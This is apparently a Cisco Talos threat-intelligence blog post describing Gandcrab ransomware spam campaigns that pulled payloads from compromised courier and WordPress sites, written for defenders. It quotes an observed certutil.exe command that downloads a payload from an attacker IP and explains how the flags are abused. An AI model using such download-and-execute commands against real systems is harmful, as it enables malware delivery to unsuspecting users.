Wednesday, May 9, 2018

Gandcrab Ransomware Walks its Way onto Compromised Sites

This blog post authored by Nick Biasini with contributions from Nick Lister and Christopher Marczewski.

Despite the recent decline in the prevalence of ransomware in the threat landscape, Cisco Talos has been monitoring the now widely distributed ransomware called Gandcrab. Gandcrab uses both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft. While we've seen cryptocurrency miners overtake ransomware as the most popular malware on the threat landscape, Gandcrab is proof that ransomware can still strike at any time.

While investigating a recent spam campaign Talos found a series of compromised websites that were being used to deliver Gandcrab. This malware is the latest in a long line of examples of why stopping malware distribution is a problem, and shows why securing websites is both an arduous and necessary task. As a clear example of how challenging resolving these issues can be, one of the sites — despite being shut down briefly — was seen serving Gandcrab not once, but twice, over a few days.

The first campaign

Beginning on April 30, 2018, Talos began observing a large-scale spam campaign that disguised itself as an online order. The subject used during this campaign was "Your Order #{Random Digits}" (i.e. Your Order #99627). A sample of the email can be seen below.

You can see above that there is a limited body and an attached ZIP file. The attached ZIP file contains a Word document. This Word document contains a macro that downloads and executes the Gandcrab ransomware. In this particular instance, the malware was being downloaded from the path below:
During the course of the campaign, we also saw emails that included VBScript files instead of a ZIP file. The end result is the same, with the payload being pulled off of the server. One of the interesting aspects to this malware is the system tools used to download the payload. There are lots of different ways that the payload can be downloaded using macros, but this particular campaign used a somewhat novel approach of leveraging certutil.exe. Certutil.exe is a command line utility that is installed as part of Certificate Services. This campaign leveraged it to allow for the downloading of a malicious payload. The specific syntax used is shown below:
certutil.exe -urlcache -split -f hxxp://185.189.58[.]222/bam.exe C:\Users\ADMINI~1\AppData\Local\Temp\FVAacW.exe
The -urlcache flag is designed to be used to display or delete URL-cached entries. However, by leveraging the -f and -split flags, the adversaries are able to force the URL to be downloaded to the location shown above. We have seen this technique used periodically by attackers, but it isn't commonly utilized. The file is then executed, and Gandcrab is installed on the target system.

Same campaign, different location

A couple days after the initial wave of this campaign, a second one started up. Beginning on May 2, Talos observed another wave of emails that were using an almost identical campaign. The subjects, bodies, and attachments were almost identical. There was one subtle change: the location the payload was being hosted. Initially, it appeared to be another random host as the get request to retrieve the malware is shown below:
We began investigating this a little further, and found when looking at DNS that this was in fact an actual legitimate website (www[.]pushpakcourier[.]net) and validated it by successfully downloading the payload from hxxp://www[.]pushpakcourier[.]net/js/kukul.exe. The website itself appears to be a courier company based out of India.

We were able to quickly determine that the website was running phpMyAdmin. We began looking a little deeper at what possible vulnerabilities could exist, and we ran into a large amount, including default credentials and multiple MySQL vulnerabilities that could be leveraged. Shortly after this was discovered, the website was taken down. Talos also attempted to directly reach out to the owners to help aid them in identifying where the threat originated from and the scope of the downloads.

This incident helps shed more light onto one of the biggest challenges we face: compromised websites. There are a huge amount of web pages available on the internet, and many of them are running on antiquated software. Most small businesses aren't aware that a new vulnerability has been released against a web framework and even if they did, most lack the expertise and time to be able to frequently update the software that the companies' websites rely upon.

Adversaries, on the other hand, are able to quickly leverage these vulnerabilities and begin widely scanning the internet looking for potential victims. Leveraging these compromised sites in these types of spam campaigns is increasingly effective because adversaries don't need to maintain persistence, or do much of anything other than copying a file to a specific location that they can point to systems, allowing for infection.

Another day, more lazy spammers

Shortly after the previous two campaigns, we spotted a third — again using the same basic subject, body and attachment types. This time, they ditched the IPs and started pulling the malware from another likely compromised site using the domain this time.
This particular site appears to be a Wordpress site, which has a plethora of vulnerabilities against it that could be leveraged. A little further digging revealed that they were running a version of Wordpress that was more than a year out of date. Additionally, Talos found that this particular site had been leveraged in the past to serve Gandcrab. This is yet another example of how compromised websites will continue to be leveraged to serve malware. This allows adversaries to save time and money, doing things like registering domains, buying VPS, and configuring a web server to host the files. The added advantage is that they also get to leverage the web reputation of the site they compromise, which could help bypass some blacklisting technologies, at least initially.

In both cases, these websites are using older versions of software and have publicly exposed the admin pages for the web frameworks they are utilizing. These are both common things that website admins miss when they are setting up a small company site. Ensuring that the administrative pages are protected and the software is patched is paramount to preventing adversaries from gaining access to serve malware.

Same site, different campaign

On May 5 and 7, Talos saw another set of spam campaigns launched using this same template again. These particular spammers are not putting much effort into making the campaigns unique. Over the course of several days, we repeatedly saw the same basic email with the malware being hosted in different locations. These campaigns are no exception, except the websites aren't new. As shown below, the adversaries have returned to the same sites they were leveraging just days earlier. This is despite the fact that the websites were taken down, likely due to malware being hosted.
Over the course of a week, we saw four different spam campaigns leveraging compromised websites, and in some cases returning to the same sites, despite attempted cleaning. This is a clear example of the challenges that face small businesses while trying to support a website for their organizations. Adversaries are quick to identify both vulnerabilities and exposed admin pages to leverage to distribute malware around the world.


Gandcrab is one of the most widely distributed ransomware variants today. It is under almost constant development, with its creators releasing new versions at an aggressive pace. Its basic functionality has been well documented. It does the typical things ransomware does, including encrypting files with the .CRAB extension, changing the user's background, and leveraging Tor for communication.

One of the interesting elements of Gandcrab is its use of namecoin domains for command and control (C2) communication. These are easily identified by the .bit top level domain (TLD). Increasingly, adversaries rely on Tor and namecoin domains to help evade identification. Namecoin is a decentralized DNS service that does not rely on a central authority instead of relying on a peer-to-peer network. This increases the difficulty associated with getting domains shut down and identifying those that are potentially behind them.

Namecoin domains provide another example of why DNS should be locked down in enterprise environments. Since namecoin relies on blockchain to provide authoritative responses, standard DNS servers are typically not effective at serving .bit domains. If an enterprise blocks all unauthorized DNS server access, most .bit domains will be blocked. We have already started to see proxy services similar to tor2web start to emerge for .bit TLDs.


With billions of dollars at stakes in the ransomware field, threats like Gandcrab are going to continue to emerge time and time again. There are millions and millions of web pages running on platforms that have thousands of vulnerabilities. Since most of these pages are created and maintained by small organizations that don't have the knowledge or resources to react to emerging vulnerabilities, this will continue to be a problem for the foreseeable future. As long as adversaries are able to hide their malware on legitimate sites, web reputation systems are going to be compromised.

The other thing we can learn from Gandcrab is that ransomware isn't going anywhere, even with the rise in the popularity of cryptocurrency miners. Adversaries are always going to follow money, whether its ransomware or malicious crypto miners, the bad guys are always looking to make a quick dollar. Some of the biggest challenges we face as a security community is the leveraging of compromised websites to distribute malware.


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on


Email Subject:
Your Order #{Random Digits}

Gandcrab Hashes:

C2 Domains:

Compromised Domains:

No comments:

Post a Comment